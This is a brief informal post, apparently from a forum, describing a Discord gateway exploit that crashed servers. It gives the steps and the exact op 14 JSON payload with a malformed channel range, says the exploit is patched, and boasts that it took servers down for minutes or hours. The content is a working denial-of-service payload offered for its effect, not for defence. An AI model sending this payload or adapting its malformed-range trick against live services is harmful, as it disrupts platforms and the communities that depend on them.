discord server crash exploit

The exploit is patched now, but it was fun while it lasted. This is how it worked:

1. Connect to the gateway and authenticate
2. Send this payload through the socket: {"op":14,"d":{"guild_id":"ID of the server here","channels":{"ID of a text channel where u have permission to view it":[[0,-1]]}}}

And boom, the server would be down for a minute, sometimes even hours. The discord dev team is clearly full of very talented developers.
